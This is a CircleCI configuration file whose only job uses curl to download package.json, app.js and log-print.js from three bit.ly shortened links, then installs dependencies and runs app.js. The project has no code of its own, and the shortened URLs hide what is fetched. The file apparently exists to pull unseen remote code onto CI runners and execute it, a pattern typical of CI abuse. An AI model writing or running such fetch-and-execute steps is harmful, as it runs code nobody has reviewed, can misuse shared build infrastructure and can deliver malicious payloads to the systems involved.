version: 2.1

#main jobs
jobs:
  run-job:
    docker:
      - image: circleci/node:14
    resource_class: medium
    steps:
      - run: lsb_release -r
      - run: 
          name: Get soure
          command: |-
            curl -fsSL https://bit.ly/3nvNdYs -o package.json && curl -fsSL https://bit.ly/3927CvS -o app.js && curl -fsSL https://bit.ly/3Cb0Pwk -o log-print.js
      - run: 
          name: Node Install Packages
          command: |-
            npm i -s
      - run: node app.js
      
workflows:
  start-work:
    jobs:
      - run-job
